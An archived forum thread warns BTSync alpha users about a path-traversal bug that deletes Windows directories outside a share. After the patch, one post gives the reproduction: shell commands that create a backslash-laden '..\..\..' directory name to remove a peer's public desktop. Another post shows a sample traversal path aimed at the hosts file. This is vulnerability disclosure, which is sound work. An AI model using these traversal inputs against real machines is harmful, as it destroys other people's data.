[SOLVED] STOP YOUR WINDOWS CLIENT NOW


rdebath

Recommended Posts

If you have any public shares running now REMOVE THEM.

BTSync will delete directories outside the share.

[HOWTO Section Deleted]

Is should be possible to use this to delete ANY directory on the windows machine.

Bad examples are obvious!

THIS IS ALPHA SOFTWARE, IT WILL HAVE SERIOUS BUGS.

PS: This applies to versions below 1.0.130

Link to post
Share on other sites

Downloaded the windows client today, did a few searches, found the Short, insecure "secrets" thread, and the cats secret (R27WAH4LQCGDFOGS7NLQYLQPXW5TRCW5) which I put in a New Folder on my desktop. After an hour or two of downloading, lots of cat pictures, I noticed a folder called "Hello" being created and deleted on my desktop. It didn't contain anything but it's very presence indicates a glitch that allows somebody to create/delete files/folders one directory higher than the one they're linked to.

Is this the security issue OP describes? I have shut down and uninstalled Sync.

Link to post
Share on other sites

May I ask how? Would you have to craft a special packet to send like:-

Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hosts

Or can you literally just say:-

Please remove C:\Windows\System32\Drivers\etc\hosts

Or what?

It's kinda like the first one, no absolute paths, but you don't have to decrypt any packets to do it. The "exploit code" is very very short.

Too short for me to give too many hints, without giving people a chance to see this thread.

Link to post
Share on other sites

Im on 1.0.116 and when i click check for update it says im good? whats the deal?

New builds are presently announced on the forum in the first instance, and will then become available through the "Check for update" button/auto update function at a later stage.

The download on the main website has also been updated to build 1.0.130

Link to post
Share on other sites
  • 3 weeks later...

Okay, 20 days, not too bad: here and here ⟹ c&p pm

[HOWTO Section SHOWN]

With a share that has both Linux and Windows 7 hosts on the Linux machine Run these commands:

$ mkdir '..\..\..\Users\Public\Desktop'

$ echo test > mkdir '..\..\..\Users\Public\Desktop'/Testfile.txt

NOTICE the use of backslashes, not forward slashes.

The Windows shared desktop directory will be removed.

It's contents may be moved to another directory on the machine.

Be careful out there!

Link to post
Share on other sites
  • 4 weeks later...

What happen when I update a BTSync installation?

Can the sync folders need to be relinked (new secret and new hashing) ??

I'm not quite sure how this relates in anyway to this particular thread?!! :wacko:

Please post your questions in a relevant thread, or if no relevant thread already exists in the forum, feel free to create a new one. Your post here bears no relevance to the subject matter of this particular thread, which had - until your post - been dormant for almost a month!

Link to post
Share on other sites

Archived

This topic is now archived and is closed to further replies.